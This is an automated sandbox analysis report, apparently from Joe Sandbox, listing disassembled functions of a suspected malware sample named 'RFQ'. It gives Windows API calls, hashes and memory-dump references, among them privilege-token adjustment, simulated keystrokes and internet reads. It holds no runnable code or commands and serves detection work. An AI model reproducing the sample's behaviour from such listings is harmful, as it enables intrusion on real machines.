                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4170576061-0
                                                                                                                                                    • Opcode ID: 10f6f4179b4d489f3aed58d6fe8af5cbdfd8eb471c63d75f5f311bd420001fe8
                                                                                                                                                    • Instruction ID: 4edc0877ce2208c5c43bffe8121fae9dd5b60e8a6d689eb6dc500b067330de56
                                                                                                                                                    • Opcode Fuzzy Hash: 10f6f4179b4d489f3aed58d6fe8af5cbdfd8eb471c63d75f5f311bd420001fe8
                                                                                                                                                    • Instruction Fuzzy Hash: 4441B570600504EFDB10BF64CC85E7E77EDEF44724F148548F9569B292DB789D018BA1
                                                                                                                                                    Function 0077EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0077EB8A
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0077EBBA
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0077EBCF
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0077EBE0
                                                                                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0077EC0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2387731787-0
                                                                                                                                                    • Opcode ID: 572e4b9d8dd87c910e3ded9b04f12239907a88efba67a427c6d23dc468d25e62
                                                                                                                                                    • Instruction ID: 3ba2e1783d56d1fed40919747016a5844e951ff22a202836dd4fa3c52ebb1e7a
                                                                                                                                                    • Opcode Fuzzy Hash: 572e4b9d8dd87c910e3ded9b04f12239907a88efba67a427c6d23dc468d25e62
                                                                                                                                                    • Instruction Fuzzy Hash: D741CF75600201DFCB18DF28C494E99B7E4FF49324F10859DFA5A8B3A1DB39A941CBA1
                                                                                                                                                    Function 00798111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                    • Opcode ID: 089a3da41d82f12e167d16911fc25ee94774b79d873089d99c20aea6959febe8
                                                                                                                                                    • Instruction ID: 597685d30661e7aa9f95505de64c8dfde63f27ca031de3d041bc4bffa8e50263
                                                                                                                                                    • Opcode Fuzzy Hash: 089a3da41d82f12e167d16911fc25ee94774b79d873089d99c20aea6959febe8
                                                                                                                                                    • Instruction Fuzzy Hash: 30119031740115ABEB212F26EC48F6EB799EF45760B04452DF849D7242DF7CAD0386A6
                                                                                                                                                    Function 0074E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0074E014,75920AE0,0074DEF1,007CDC38,?,?), ref: 0074E02C
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0074E03E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                                                    • Opcode ID: d10598252c099e7e01b363dbada991027c8d92b7c332bc2595215e50a1052c9b
                                                                                                                                                    • Instruction ID: 092b0fae0f2badcde8f7d9fb2492e4d8fc7768a499f72f59accf9df897ed8b69
                                                                                                                                                    • Opcode Fuzzy Hash: d10598252c099e7e01b363dbada991027c8d92b7c332bc2595215e50a1052c9b
                                                                                                                                                    • Instruction Fuzzy Hash: 44D05E704407269EC7314B65EC0CB1276D9AF04310F298429E49192160EBBCC8818750
                                                                                                                                                    Function 0074B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 0074B22F
                                                                                                                                                      • Part of subcall function 0074B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0074B5A5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Proc$LongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2749884682-0
                                                                                                                                                    • Opcode ID: aafb51ac9809c6e71ede66ba48b9beda8543195a555fd3cb08afdb764eeb6e17
                                                                                                                                                    • Instruction ID: d34411016dd1c86b2f737dbbb7f09d4df76ec045063d80385848265fe908c64e
                                                                                                                                                    • Opcode Fuzzy Hash: aafb51ac9809c6e71ede66ba48b9beda8543195a555fd3cb08afdb764eeb6e17
                                                                                                                                                    • Instruction Fuzzy Hash: CEA12570114109FAEF28AF2A6C9DEBF296CFB87344F54421AF402D6191DB6DDC11D272
                                                                                                                                                    Function 00784EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007843BF,00000000), ref: 00784FA6
                                                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00784FD2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 599397726-0
                                                                                                                                                    • Opcode ID: c9e50c43555a3ede972886e29fb2791afac3943d888958f8cbf37cf4ff753dd7
                                                                                                                                                    • Instruction ID: 7b4aedab81c6020cb11090820fcde6114d063f2e337b89a855fa0f99d62bbbf8
                                                                                                                                                    • Opcode Fuzzy Hash: c9e50c43555a3ede972886e29fb2791afac3943d888958f8cbf37cf4ff753dd7
                                                                                                                                                    • Instruction Fuzzy Hash: E241F97154420AFFEB21EE90CC85EBF77BCEB40354F10406EF605A6141EBB99E419790
                                                                                                                                                    Function 007377B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: \Q~
                                                                                                                                                    • API String ID: 4104443479-2398764776
                                                                                                                                                    • Opcode ID: 45e572acd865e584336275f6812ebdba67dea6ee71b56660502a4f9f55aeea4c
                                                                                                                                                    • Instruction ID: 607f7106669789241f2201e2477223ac5fec4eb21e64344f9d4b45a87576d220
                                                                                                                                                    • Opcode Fuzzy Hash: 45e572acd865e584336275f6812ebdba67dea6ee71b56660502a4f9f55aeea4c
                                                                                                                                                    • Instruction Fuzzy Hash: EFA23DB0905219CFDB28CF58C4807EDB7B1FF49314F6582A9E859AB391D7389E81DB90
                                                                                                                                                    Function 0077E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0077E20D
                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0077E267
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0077E2B4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1682464887-0
                                                                                                                                                    • Opcode ID: 0a9232871d78a487114423b4f087f8684f7a204db576fbd63b4b38bd5dc21172
                                                                                                                                                    • Instruction ID: a25b059d347277e9cecee0b55b3b90af68727528c63b3d0644d7fb1de05befae
                                                                                                                                                    • Opcode Fuzzy Hash: 0a9232871d78a487114423b4f087f8684f7a204db576fbd63b4b38bd5dc21172
                                                                                                                                                    • Instruction Fuzzy Hash: F6216075A00518EFCB00DFA5D884EADFBB9FF48310F0484A9E905AB252DB399915CB54
                                                                                                                                                    Function 0076B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074F4EA: std::exception::exception.LIBCMT ref: 0074F51E
                                                                                                                                                      • Part of subcall function 0074F4EA: __CxxThrowException@8.LIBCMT ref: 0074F533
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076B180
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076B1AD
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0076B1BA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1922334811-0
                                                                                                                                                    • Opcode ID: 8dc79bba621dbf4b9a9b7bb6d9b24e870195b3b421eaf53210e58cb61c503267
                                                                                                                                                    • Instruction ID: 90485cc0a801d9e011765cf94ab4dd852af74bfbfc3e5664cd612c51a642c8ad
                                                                                                                                                    • Opcode Fuzzy Hash: 8dc79bba621dbf4b9a9b7bb6d9b24e870195b3b421eaf53210e58cb61c503267
                                                                                                                                                    • Instruction Fuzzy Hash: 3C1191B1504205BFE728AF64DCC5D2BB7BDFB45710B20852EF45697241EB74FC418A60
                                                                                                                                                    Function 00776606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00776623
                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00776664
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0077666F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 33631002-0
                                                                                                                                                    • Opcode ID: 566b4f8311f4e28fd873817f0463bdbbb7b20c0038a4f464e7ffd0cc2f4f57ca
                                                                                                                                                    • Instruction ID: 33a3cc494e7955fbb6f04f810725caa0d5666b8b7529669e2ba609eb712db96c
                                                                                                                                                    • Opcode Fuzzy Hash: 566b4f8311f4e28fd873817f0463bdbbb7b20c0038a4f464e7ffd0cc2f4f57ca
                                                                                                                                                    • Instruction Fuzzy Hash: C7113C71E01228BFDB108FA9DC44FAEBBFCEB45B50F108152F904E6290D2B45E018BA5
                                                                                                                                                    Function 007771FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00777223
                                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0077723A
                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0077724A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                    • Opcode ID: 8909317a673c308c20e769177c99ad55f41ee4fab97d8ebb44a7e4824005641f
                                                                                                                                                    • Instruction ID: 54d128f2ffce65a7621a8cb433c11b3f2be59e782db966c7bbe6e367c1b10378
                                                                                                                                                    • Opcode Fuzzy Hash: 8909317a673c308c20e769177c99ad55f41ee4fab97d8ebb44a7e4824005641f
                                                                                                                                                    • Instruction Fuzzy Hash: 39F01D76A04209BFDF04DFE4DD89EEEBBB8FF08201F508569A602E2191E2749A448B14
                                                                                                                                                    Function 0077F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0077F599
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0077F5C9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                    • Opcode ID: 22ac20532267b09bc9730bd1bddd67149acd28909002fcf27e4a1acab9af86c1
                                                                                                                                                    • Instruction ID: 06b0866b6301f94373261342fae766bfdff530ca4fd0581e0274de879f5516d4
                                                                                                                                                    • Opcode Fuzzy Hash: 22ac20532267b09bc9730bd1bddd67149acd28909002fcf27e4a1acab9af86c1
                                                                                                                                                    • Instruction Fuzzy Hash: 0411A5716002049FDB10DF28D849A2EB3E8FF84324F01C51DF969D7291DB34AD118B95
                                                                                                                                                    Function 0077CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0078BE6A,?,?,00000000,?), ref: 0077CEA7
                                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0078BE6A,?,?,00000000,?), ref: 0077CEB9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                    • Opcode ID: 7b38b2ecbed5a1e59c9da5f4d9ab0b6c9d5f4c6c2524b978fdf7420ca1d1a298
                                                                                                                                                    • Instruction ID: 7e90e71cf11c653e8a4ff7cda6e6f0aef937794dc44f210dcb42cfd4b187220d
                                                                                                                                                    • Opcode Fuzzy Hash: 7b38b2ecbed5a1e59c9da5f4d9ab0b6c9d5f4c6c2524b978fdf7420ca1d1a298
                                                                                                                                                    • Instruction Fuzzy Hash: 12F08231100229EBDB219FA4DC49FEA776DBF093A1F008265F919D6181D6749A44CBA0
                                                                                                                                                    Function 0077411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00774153
                                                                                                                                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00774166
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                                    • Opcode ID: 70598f97377779c22729f877255b37d44603b412da26c44d993678b6997bff51
                                                                                                                                                    • Instruction ID: dbc5cf18fea6352e787eb915a844fdb6356027d14a5258421133143a57676aa6
                                                                                                                                                    • Opcode Fuzzy Hash: 70598f97377779c22729f877255b37d44603b412da26c44d993678b6997bff51
                                                                                                                                                    • Instruction Fuzzy Hash: 57F06D7090024DAFDF159FA4C805BBE7BB0EF00305F00C009F96596191D7798612DFA4
                                                                                                                                                    Function 0076AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0076ACC0), ref: 0076AB99
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,0076ACC0), ref: 0076ABAB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                    • Opcode ID: 30cf84e91f0ba916cf8eaabbd39620dcde5f1824edf606b2088130d6a62f08bd
                                                                                                                                                    • Instruction ID: 00c851586a66ddfa4f6faadf7bff68ee73e976e1614f4f1e6ca7b3c02e86d241
                                                                                                                                                    • Opcode Fuzzy Hash: 30cf84e91f0ba916cf8eaabbd39620dcde5f1824edf606b2088130d6a62f08bd
                                                                                                                                                    • Instruction Fuzzy Hash: 2FE0E675004510EFE7252F54EC09E77B7E9EF04320B11C529F95A81475D7665C90DB50
                                                                                                                                                    Function 007581AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00756DB3,-0000031A,?,?,00000001), ref: 007581B1
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007581BA
